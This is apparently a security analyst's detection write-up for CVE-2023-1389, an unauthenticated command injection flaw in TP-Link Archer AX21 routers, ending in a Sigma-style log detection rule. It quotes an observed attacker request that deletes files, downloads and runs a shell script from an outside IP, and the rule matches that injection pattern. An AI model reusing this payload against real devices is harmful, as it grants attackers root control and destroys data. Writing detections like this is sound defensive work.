CVE-2023-1389 Unauthenticated Command Injection Vulnerability

[cY83rR0H1t]

Description of the Idea of the Rule

A security vulnerability was identified in the TP-Link Archer AX21 (AX1800). This vulnerability involves a command injection flaw present in the country form of the /cgi-bin/luci;stok=/locale endpoint within the web management interface. The issue arises from inadequate sanitization of the country parameter during a write operation, leading to its use in a call to popen(). Consequently, an unauthorized attacker can exploit this vulnerability by sending a simple GET request to inject arbitrary commands. The injected commands run with root privileges, posing a risk to the system's security.

I have seen this exploit query in my client environment recently.
Attacker command:- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget hxxp://45.142.214.108/tenda.sh; chmod 777 tenda.sh; ./tenda.sh)

Public References / Example Event Log

https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94

title: CVE-2023-1389 Unauthenticated Command Injection Vulnerability
id: 59cf3413-8816-4beb-a04c-3d207ad0ab27
status: experimental
description: Detect CVE-2023-1389 TP-Link Archer AX21 RCE
references:
    - https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
author: Rohit Jain
date: 2024/02/28
logsource:
    category: webserver
detection:
    selection:
        cs-method: GET
        cs-uri-query: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(
    condition: selection
falsepositives:
    - Unknown
level: medium